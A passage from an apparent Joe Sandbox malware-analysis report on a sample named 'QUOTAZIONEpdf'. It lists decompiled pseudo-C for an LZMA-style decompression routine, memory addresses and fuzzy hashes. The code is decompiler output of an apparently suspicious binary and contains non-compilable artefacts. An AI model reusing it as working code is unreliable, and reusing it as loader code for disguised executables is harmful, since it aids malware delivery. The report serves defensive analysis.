                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												L60:
                												__eflags = __ebx - 0x100;
                												if(__ebx >= 0x100) {
                													L55:
                													__al =  *(__ebp - 0x44);
                													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                													goto L56;
                												}
                												L61:
                												__eax =  *(__ebp - 0x58);
                												__edx = __ebx + __ebx;
                												__ecx =  *(__ebp - 0x10);
                												__esi = __edx + __eax;
                												__ecx =  *(__ebp - 0x10) >> 0xb;
                												__ax =  *__esi;
                												 *(__ebp - 0x54) = __esi;
                												__edi = __ax & 0x0000ffff;
                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                												__eflags =  *(__ebp - 0xc) - __ecx;
                												if( *(__ebp - 0xc) >= __ecx) {
                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                													__cx = __ax;
                													_t217 = __edx + 1; // 0x1
                													__ebx = _t217;
                													__cx = __ax >> 5;
                													__eflags = __eax;
                													 *__esi = __ax;
                												} else {
                													 *(__ebp - 0x10) = __ecx;
                													0x800 = 0x800 - __edi;
                													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                													__ebx = __ebx + __ebx;
                													 *__esi = __cx;
                												}
                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                												 *(__ebp - 0x44) = __ebx;
                												if( *(__ebp - 0x10) >= 0x1000000) {
                													goto L60;
                												} else {
                													goto L58;
                												}
                											case 0x10:
                												L109:
                												__eflags =  *(__ebp - 0x6c);
                												if( *(__ebp - 0x6c) == 0) {
                													 *(__ebp - 0x88) = 0x10;
                													goto L170;
                												}
                												__ecx =  *(__ebp - 0x70);
                												__eax =  *(__ebp - 0xc);
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												_t365 = __ebp - 0x70;
                												 *_t365 =  *(__ebp - 0x70) + 1;
                												__eflags =  *_t365;
                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												goto L111;
                											case 0x11:
                												L68:
                												_t614 =  *(_t621 - 0x58);
                												 *(_t621 - 0x84) = 0x12;
                												while(1) {
                													L132:
                													 *(_t621 - 0x54) = _t614;
                													goto L133;
                												}
                											case 0x12:
                												__eflags =  *(__ebp - 0x40);
                												if( *(__ebp - 0x40) != 0) {
                													__eax =  *(__ebp - 0x58);
                													 *(__ebp - 0x84) = 0x13;
                													__esi =  *(__ebp - 0x58) + 2;
                													while(1) {
                														L132:
                														 *(_t621 - 0x54) = _t614;
                														goto L133;
                													}
                												}
                												__eax =  *(__ebp - 0x4c);
                												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                												__ecx =  *(__ebp - 0x58);
                												__eax =  *(__ebp - 0x4c) << 4;
                												__eflags = __eax;
                												__eax =  *(__ebp - 0x58) + __eax + 4;
                												goto L130;
                											case 0x13:
                												__eflags =  *(__ebp - 0x40);
                												if( *(__ebp - 0x40) != 0) {
                													_t469 = __ebp - 0x58;
                													 *_t469 =  *(__ebp - 0x58) + 0x204;
                													__eflags =  *_t469;
                													 *(__ebp - 0x30) = 0x10;
                													 *(__ebp - 0x40) = 8;
                													L144:
                													 *(__ebp - 0x7c) = 0x14;
                													goto L145;
                												}
                												__eax =  *(__ebp - 0x4c);
                												__ecx =  *(__ebp - 0x58);
                												__eax =  *(__ebp - 0x4c) << 4;
                												 *(__ebp - 0x30) = 8;
                												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                												L130:
                												 *(__ebp - 0x58) = __eax;
                												 *(__ebp - 0x40) = 3;
                												goto L144;
                											case 0x14:
                												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                												__eax =  *(__ebp - 0x80);
                												 *(_t621 - 0x88) = _t542;
                												goto L1;
                											case 0x15:
                												__eax = 0;
                												__eflags =  *(__ebp - 0x38) - 7;
                												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                												__al = __al & 0x000000fd;
                												__eax = (__eflags >= 0) - 1 + 0xb;
                												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                												goto L120;
                											case 0x16:
                												__eax =  *(__ebp - 0x30);
                												__eflags = __eax - 4;
                												if(__eax >= 4) {
                													_push(3);
                													_pop(__eax);
                												}
                												__ecx =  *(__ebp - 4);
                												 *(__ebp - 0x40) = 6;
                												__eax = __eax << 7;
                												 *(__ebp - 0x7c) = 0x19;
                												 *(__ebp - 0x58) = __eax;
                												goto L145;
                											case 0x17:
                												L145:
                												__eax =  *(__ebp - 0x40);
                												 *(__ebp - 0x50) = 1;
                												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                												goto L149;
                											case 0x18:
                												L146:
                												__eflags =  *(__ebp - 0x6c);
                												if( *(__ebp - 0x6c) == 0) {
                													 *(__ebp - 0x88) = 0x18;
                													goto L170;
                												}
                												__ecx =  *(__ebp - 0x70);
                												__eax =  *(__ebp - 0xc);
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												_t484 = __ebp - 0x70;
                												 *_t484 =  *(__ebp - 0x70) + 1;
                												__eflags =  *_t484;
                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												L148:
                												_t487 = __ebp - 0x48;
                												 *_t487 =  *(__ebp - 0x48) - 1;
                												__eflags =  *_t487;
                												L149:
                												__eflags =  *(__ebp - 0x48);
                												if( *(__ebp - 0x48) <= 0) {
                													__ecx =  *(__ebp - 0x40);
                													__ebx =  *(__ebp - 0x50);
                													0 = 1;
                													__eax = 1 << __cl;
                													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                													__eax =  *(__ebp - 0x7c);
                													 *(__ebp - 0x44) = __ebx;
                													while(1) {
                														 *(_t621 - 0x88) = _t542;
                														goto L1;
                													}
                												}
                												__eax =  *(__ebp - 0x50);
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                												__eax =  *(__ebp - 0x58);
                												__esi = __edx + __eax;
                												 *(__ebp - 0x54) = __esi;
                												__ax =  *__esi;
                												__edi = __ax & 0x0000ffff;
                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                												__eflags =  *(__ebp - 0xc) - __ecx;
                												if( *(__ebp - 0xc) >= __ecx) {
                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                													__cx = __ax;
                													__cx = __ax >> 5;
                													__eax = __eax - __ecx;
                													__edx = __edx + 1;
                													__eflags = __edx;
                													 *__esi = __ax;
                													 *(__ebp - 0x50) = __edx;
                												} else {
                													 *(__ebp - 0x10) = __ecx;
                													0x800 = 0x800 - __edi;
                													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                													 *__esi = __cx;
                												}
                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                												if( *(__ebp - 0x10) >= 0x1000000) {
                													goto L148;
                												} else {
                													goto L146;
                												}
                											case 0x19:
                												__eflags = __ebx - 4;
                												if(__ebx < 4) {
                													 *(__ebp - 0x2c) = __ebx;
                													L119:
                													_t393 = __ebp - 0x2c;
                													 *_t393 =  *(__ebp - 0x2c) + 1;
                													__eflags =  *_t393;
                													L120:
                													__eax =  *(__ebp - 0x2c);
                													__eflags = __eax;
                													if(__eax == 0) {
                														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                														goto L170;
                													}
                													__eflags = __eax -  *(__ebp - 0x60);
                													if(__eax >  *(__ebp - 0x60)) {
                														goto L171;
                													}
                													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                													__eax =  *(__ebp - 0x30);
                													_t400 = __ebp - 0x60;
                													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                													__eflags =  *_t400;
                													goto L123;
                												}
                												__ecx = __ebx;
                												__eax = __ebx;
                												__ecx = __ebx >> 1;
                												__eax = __ebx & 0x00000001;
                												__ecx = (__ebx >> 1) - 1;
                												__al = __al | 0x00000002;
                												__eax = (__ebx & 0x00000001) << __cl;
                												__eflags = __ebx - 0xe;
                												 *(__ebp - 0x2c) = __eax;
                												if(__ebx >= 0xe) {
                													__ebx = 0;
                													 *(__ebp - 0x48) = __ecx;
                													L102:
                													__eflags =  *(__ebp - 0x48);
                													if( *(__ebp - 0x48) <= 0) {
                														__eax = __eax + __ebx;
                														 *(__ebp - 0x40) = 4;
                														 *(__ebp - 0x2c) = __eax;
                														__eax =  *(__ebp - 4);
                														__eax =  *(__ebp - 4) + 0x644;
                														__eflags = __eax;
                														L108:
                														__ebx = 0;
                														 *(__ebp - 0x58) = __eax;
                														 *(__ebp - 0x50) = 1;
                														 *(__ebp - 0x44) = 0;
                														 *(__ebp - 0x48) = 0;
                														L112:
                														__eax =  *(__ebp - 0x40);
                														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                															_t391 = __ebp - 0x2c;
                															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                															__eflags =  *_t391;
                															goto L119;
                														}
                														__eax =  *(__ebp - 0x50);
                														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                														__eax =  *(__ebp - 0x58);
                														__esi = __edi + __eax;
                														 *(__ebp - 0x54) = __esi;
                														__ax =  *__esi;
                														__ecx = __ax & 0x0000ffff;
                														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                														__eflags =  *(__ebp - 0xc) - __edx;
                														if( *(__ebp - 0xc) >= __edx) {
                															__ecx = 0;
                															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                															__ecx = 1;
                															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                															__ebx = 1;
                															__ecx =  *(__ebp - 0x48);
                															__ebx = 1 << __cl;
                															__ecx = 1 << __cl;
                															__ebx =  *(__ebp - 0x44);
                															__ebx =  *(__ebp - 0x44) | __ecx;
                															__cx = __ax;
                															__cx = __ax >> 5;
                															__eax = __eax - __ecx;
                															__edi = __edi + 1;
                															__eflags = __edi;
                															 *(__ebp - 0x44) = __ebx;
                															 *__esi = __ax;
                															 *(__ebp - 0x50) = __edi;
                														} else {
                															 *(__ebp - 0x10) = __edx;
                															0x800 = 0x800 - __ecx;
                															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                															 *__esi = __dx;
                														}
                														__eflags =  *(__ebp - 0x10) - 0x1000000;
                														if( *(__ebp - 0x10) >= 0x1000000) {
                															L111:
                															_t368 = __ebp - 0x48;
                															 *_t368 =  *(__ebp - 0x48) + 1;
                															__eflags =  *_t368;
                															goto L112;
                														} else {
                															goto L109;
                														}
                													}
                													__ecx =  *(__ebp - 0xc);
                													__ebx = __ebx + __ebx;
                													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                													 *(__ebp - 0x44) = __ebx;
                													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                														__ecx =  *(__ebp - 0x10);
                														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                														__ebx = __ebx | 0x00000001;
                														__eflags = __ebx;
                														 *(__ebp - 0x44) = __ebx;
                													}
                													__eflags =  *(__ebp - 0x10) - 0x1000000;
                													if( *(__ebp - 0x10) >= 0x1000000) {
                														L101:
                														_t338 = __ebp - 0x48;
                														 *_t338 =  *(__ebp - 0x48) - 1;
                														__eflags =  *_t338;
                														goto L102;
                													} else {
                														goto L99;
                													}
                												}
                												__edx =  *(__ebp - 4);
                												__eax = __eax - __ebx;
                												 *(__ebp - 0x40) = __ecx;
                												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                												goto L108;
                											case 0x1a:
                												L56:
                												__eflags =  *(__ebp - 0x64);
                												if( *(__ebp - 0x64) == 0) {
                													 *(__ebp - 0x88) = 0x1a;
                													goto L170;
                												}
                												__ecx =  *(__ebp - 0x68);
                												__al =  *(__ebp - 0x5c);
                												__edx =  *(__ebp - 8);
                												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                												 *( *(__ebp - 0x68)) = __al;
                												__ecx =  *(__ebp - 0x14);
                												 *(__ecx +  *(__ebp - 8)) = __al;
                												__eax = __ecx + 1;
                												__edx = 0;
                												_t192 = __eax %  *(__ebp - 0x74);
                												__eax = __eax /  *(__ebp - 0x74);
                												__edx = _t192;
                												goto L79;
                											case 0x1b:
                												L75:
                												__eflags =  *(__ebp - 0x64);
                												if( *(__ebp - 0x64) == 0) {
                													 *(__ebp - 0x88) = 0x1b;
                													goto L170;
                												}
                												__eax =  *(__ebp - 0x14);
                												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                												__eflags = __eax -  *(__ebp - 0x74);
                												if(__eax >=  *(__ebp - 0x74)) {
                													__eax = __eax +  *(__ebp - 0x74);
                													__eflags = __eax;
                												}
                												__edx =  *(__ebp - 8);
                												__cl =  *(__eax + __edx);
                												__eax =  *(__ebp - 0x14);
                												 *(__ebp - 0x5c) = __cl;
                												 *(__eax + __edx) = __cl;
                												__eax = __eax + 1;
                												__edx = 0;
                												_t274 = __eax %  *(__ebp - 0x74);
                												__eax = __eax /  *(__ebp - 0x74);
                												__edx = _t274;
                												__eax =  *(__ebp - 0x68);
                												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                												_t283 = __ebp - 0x64;
                												 *_t283 =  *(__ebp - 0x64) - 1;
                												__eflags =  *_t283;
                												 *( *(__ebp - 0x68)) = __cl;
                												L79:
                												 *(__ebp - 0x14) = __edx;
                												goto L80;
                											case 0x1c:
                												while(1) {
                													L123:
                													__eflags =  *(__ebp - 0x64);
                													if( *(__ebp - 0x64) == 0) {
                														break;
                													}
                													__eax =  *(__ebp - 0x14);
                													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                													__eflags = __eax -  *(__ebp - 0x74);
                													if(__eax >=  *(__ebp - 0x74)) {
                														__eax = __eax +  *(__ebp - 0x74);
                														__eflags = __eax;
                													}
                													__edx =  *(__ebp - 8);
                													__cl =  *(__eax + __edx);
                													__eax =  *(__ebp - 0x14);
                													 *(__ebp - 0x5c) = __cl;
                													 *(__eax + __edx) = __cl;
                													__eax = __eax + 1;
                													__edx = 0;
                													_t414 = __eax %  *(__ebp - 0x74);
                													__eax = __eax /  *(__ebp - 0x74);
                													__edx = _t414;
                													__eax =  *(__ebp - 0x68);
                													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                													__eflags =  *(__ebp - 0x30);
                													 *( *(__ebp - 0x68)) = __cl;
                													 *(__ebp - 0x14) = _t414;
                													if( *(__ebp - 0x30) > 0) {
                														continue;
                													} else {
                														L80:
                														 *(__ebp - 0x88) = 2;
                														goto L1;
                													}
                												}
                												 *(__ebp - 0x88) = 0x1c;
                												goto L170;
                										}
                									}
                									L171:
                									_t544 = _t543 | 0xffffffff;
                									goto L172;
                								}
                							}
                						}
                					}
                					goto L1;
                				}
                			}














                0x004067fd
                0x00406801
                0x00406803
                0x00406803
                0x00406804
                0x00406807
                0x004067dd
                0x004067dd
                0x004067e5
                0x004067ea
                0x004067ec
                0x004067ef
                0x004067ef
                0x0040680a
                0x00406811
                0x00000000
                0x00406813
                0x00000000
                0x00406813
                0x00000000
                0x004064af
                0x004064b2
                0x004064e8
                0x00406618
                0x00406618
                0x00406618
                0x00406618
                0x0040661b
                0x0040661b
                0x0040661e
                0x00406620
                0x004068aa
                0x00000000
                0x004068aa
                0x00406626
                0x00406629
                0x00000000
                0x00000000
                0x0040662f
                0x00406633
                0x00406636
                0x00406636
                0x00406636
                0x00000000
                0x00406636
                0x004064b4
                0x004064b6
                0x004064b8
                0x004064ba
                0x004064bd
                0x004064be
                0x004064c0
                0x004064c2
                0x004064c5
                0x004064c8
                0x004064de
                0x004064e3
                0x0040651b
                0x0040651b
                0x0040651f
                0x0040654b
                0x0040654d
                0x00406554
                0x00406557
                0x0040655a
                0x0040655a
                0x0040655f
                0x0040655f
                0x00406561
                0x00406564
                0x0040656b
                0x0040656e
                0x0040659b
                0x0040659b
                0x0040659e
                0x004065a1
                0x00406615
                0x00406615
                0x00406615
                0x00000000
                0x00406615
                0x004065a3
                0x004065a9
                0x004065ac
                0x004065af
                0x004065b2
                0x004065b5
                0x004065b8
                0x004065bb
                0x004065be
                0x004065c1
                0x004065c4
                0x004065dd
                0x004065df
                0x004065e2
                0x004065e3
                0x004065e6
                0x004065e8
                0x004065eb
                0x004065ed
                0x004065ef
                0x004065f2
                0x004065f4
                0x004065f7
                0x004065fb
                0x004065fd
                0x004065fd
                0x004065fe
                0x00406601
                0x00406604
                0x004065c6
                0x004065c6
                0x004065ce
                0x004065d3
                0x004065d5
                0x004065d8
                0x004065d8
                0x00406607
                0x0040660e
                0x00406598
                0x00406598
                0x00406598
                0x00406598
                0x00000000
                0x00406610
                0x00000000
                0x00406610
                0x0040660e
                0x00406521
                0x00406524
                0x00406526
                0x00406529
                0x0040652c
                0x0040652f
                0x00406531
                0x00406534
                0x00406537
                0x00406537
                0x0040653a
                0x0040653a
                0x0040653d
                0x00406544
                0x00406518
                0x00406518
                0x00406518
                0x00406518
                0x00000000
                0x00406546
                0x00000000
                0x00406546
                0x00406544
                0x004064ca
                0x004064cd
                0x004064cf
                0x004064d2
                0x00000000
                0x00000000
                0x00406231
                0x00406231
                0x00406235
                0x0040687a
                0x00000000
                0x0040687a
                0x0040623b
                0x0040623e
                0x00406241
                0x00406244
                0x00406247
                0x0040624a
                0x0040624d
                0x0040624f
                0x00406252
                0x00406255
                0x00406258
                0x0040625a
                0x0040625a
                0x0040625a
                0x00000000
                0x00000000
                0x004063bc
                0x004063bc
                0x004063c0
                0x00406886
                0x00000000
                0x00406886
                0x004063c6
                0x004063c9
                0x004063cc
                0x004063cf
                0x004063d1
                0x004063d1
                0x004063d1
                0x004063d4
                0x004063d7
                0x004063da
                0x004063dd
                0x004063e0
                0x004063e3
                0x004063e4
                0x004063e6
                0x004063e6
                0x004063e6
                0x004063e9
                0x004063ec
                0x004063ef
                0x004063f2
                0x004063f2
                0x004063f2
                0x004063f5
                0x004063f7
                0x004063f7
                0x00000000
                0x00000000
                0x00406639
                0x00406639
                0x00406639
                0x0040663d
                0x00000000
                0x00000000
                0x00406643
                0x00406646
                0x00406649
                0x0040664c
                0x0040664e
                0x0040664e
                0x0040664e
                0x00406651
                0x00406654
                0x00406657
                0x0040665a
                0x0040665d
                0x00406660
                0x00406661
                0x00406663
                0x00406663
                0x00406663
                0x00406666
                0x00406669
                0x0040666c
                0x0040666f
                0x00406672
                0x00406676
                0x00406678
                0x0040667b
                0x00000000
                0x0040667d
                0x004063fa
                0x004063fa
                0x00000000
                0x004063fa
                0x0040667b
                0x004068b0
                0x00000000
                0x00000000
                0x00405edf
                0x004068e7
                0x004068e7
                0x00000000
                0x004068e7
                0x00406734
                0x004066bb
                0x004066b8
                0x00000000
                0x004062ef

                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
                • Instruction ID: 4708b7c85b45d81bde2c34293bfadd2d5d28089b3d5bcf645a888e2e7e0fcfc2
                • Opcode Fuzzy Hash: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
                • Instruction Fuzzy Hash: 91711371D00229DFDF24CFA8C844BADBBB1FB44305F15816AD816B7281D7389996DF54
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 98%
                			E00406409() {
                				unsigned short _t531;
                				signed int _t532;
                				void _t533;
                				signed int _t534;
                				signed int _t535;
                				signed int _t565;
                				signed int _t568;
                				signed int _t589;
                				signed int* _t606;
                				void* _t613;
                
                				L0:
                				while(1) {
                					L0:
                					if( *(_t613 - 0x40) != 0) {
                						 *(_t613 - 0x84) = 0xb;
                						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                						goto L132;
                					} else {
                						__eax =  *(__ebp - 0x28);
                						L88:
                						 *(__ebp - 0x2c) = __eax;
                						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                						L89:
                						__eax =  *(__ebp - 4);
                						 *(__ebp - 0x80) = 0x15;
                						__eax =  *(__ebp - 4) + 0xa68;
                						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                						L69:
                						 *(__ebp - 0x84) = 0x12;
                						while(1) {
                							L132:
                							 *(_t613 - 0x54) = _t606;
                							while(1) {
                								L133:
                								_t531 =  *_t606;
                								_t589 = _t531 & 0x0000ffff;
                								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                								if( *(_t613 - 0xc) >= _t565) {
                									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                									 *(_t613 - 0x40) = 1;
                									_t532 = _t531 - (_t531 >> 5);
                									 *_t606 = _t532;
                								} else {
                									 *(_t613 - 0x10) = _t565;
                									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                								}
                								if( *(_t613 - 0x10) >= 0x1000000) {
                									goto L139;
                								}
                								L137:
                								if( *(_t613 - 0x6c) == 0) {
                									 *(_t613 - 0x88) = 5;
                									L170:
                									_t568 = 0x22;
                									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                									_t535 = 0;
                									L172:
                									return _t535;
                								}
                								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                								L139:
                								_t533 =  *(_t613 - 0x84);
                								while(1) {
                									 *(_t613 - 0x88) = _t533;
                									while(1) {
                										L1:
                										_t534 =  *(_t613 - 0x88);
                										if(_t534 > 0x1c) {
                											break;
                										}
                										switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                											case 0:
                												if( *(_t613 - 0x6c) == 0) {
                													goto L170;
                												}
                												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                												_t534 =  *( *(_t613 - 0x70));
                												if(_t534 > 0xe1) {
                													goto L171;
                												}
                												_t538 = _t534 & 0x000000ff;
                												_push(0x2d);
                												asm("cdq");
                												_pop(_t570);
                												_push(9);
                												_pop(_t571);
                												_t609 = _t538 / _t570;
                												_t540 = _t538 % _t570 & 0x000000ff;
                												asm("cdq");
                												_t604 = _t540 % _t571 & 0x000000ff;
                												 *(_t613 - 0x3c) = _t604;
                												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                												_t612 = (0x300 << _t604 + _t609) + 0x736;
                												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                													L10:
                													if(_t612 == 0) {
                														L12:
                														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                														goto L15;
                													} else {
                														goto L11;
                													}
                													do {
                														L11:
                														_t612 = _t612 - 1;
                														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                													} while (_t612 != 0);
                													goto L12;
                												}
                												if( *(_t613 - 4) != 0) {
                													GlobalFree( *(_t613 - 4));
                												}
                												_t534 = GlobalAlloc(0x40, 0x600); // executed
                												 *(_t613 - 4) = _t534;
                												if(_t534 == 0) {
                													goto L171;
                												} else {
                													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                													goto L10;
                												}
                											case 1:
                												L13:
                												__eflags =  *(_t613 - 0x6c);
                												if( *(_t613 - 0x6c) == 0) {
                													 *(_t613 - 0x88) = 1;
                													goto L170;
                												}
                												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                												_t45 = _t613 - 0x48;
                												 *_t45 =  *(_t613 - 0x48) + 1;
                												__eflags =  *_t45;
                												L15:
                												if( *(_t613 - 0x48) < 4) {
                													goto L13;
                												}
                												_t546 =  *(_t613 - 0x40);
                												if(_t546 ==  *(_t613 - 0x74)) {
                													L20:
                													 *(_t613 - 0x48) = 5;
                													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                													goto L23;
                												}
                												 *(_t613 - 0x74) = _t546;
                												if( *(_t613 - 8) != 0) {
                													GlobalFree( *(_t613 - 8));
                												}
                												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                												 *(_t613 - 8) = _t534;
                												if(_t534 == 0) {
                													goto L171;
                												} else {
                													goto L20;
                												}
                											case 2:
                												L24:
                												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                												 *(_t613 - 0x84) = 6;
                												 *(_t613 - 0x4c) = _t553;
                												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                												L132:
                												 *(_t613 - 0x54) = _t606;
                												goto L133;
                											case 3:
                												L21:
                												__eflags =  *(_t613 - 0x6c);
                												if( *(_t613 - 0x6c) == 0) {
                													 *(_t613 - 0x88) = 3;
                													goto L170;
                												}
                												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                												_t67 = _t613 - 0x70;
                												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                												__eflags =  *_t67;
                												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                												L23:
                												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                												if( *(_t613 - 0x48) != 0) {
                													goto L21;
                												}
                												goto L24;
                											case 4:
                												L133:
                												_t531 =  *_t606;
                												_t589 = _t531 & 0x0000ffff;
                												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                												if( *(_t613 - 0xc) >= _t565) {
                													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                													 *(_t613 - 0x40) = 1;
                													_t532 = _t531 - (_t531 >> 5);
                													 *_t606 = _t532;
                												} else {
                													 *(_t613 - 0x10) = _t565;
                													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                												}
                												if( *(_t613 - 0x10) >= 0x1000000) {
                													goto L139;
                												}
                											case 5:
                												goto L137;
                											case 6:
                												__edx = 0;
                												__eflags =  *(__ebp - 0x40);
                												if( *(__ebp - 0x40) != 0) {
                													__eax =  *(__ebp - 4);
                													__ecx =  *(__ebp - 0x38);
                													 *(__ebp - 0x34) = 1;
                													 *(__ebp - 0x84) = 7;
                													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                													while(1) {
                														L132:
                														 *(_t613 - 0x54) = _t606;
                														goto L133;
                													}
                												}
                												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                												__esi =  *(__ebp - 0x60);
                												__cl = 8;
                												__cl = 8 -  *(__ebp - 0x3c);
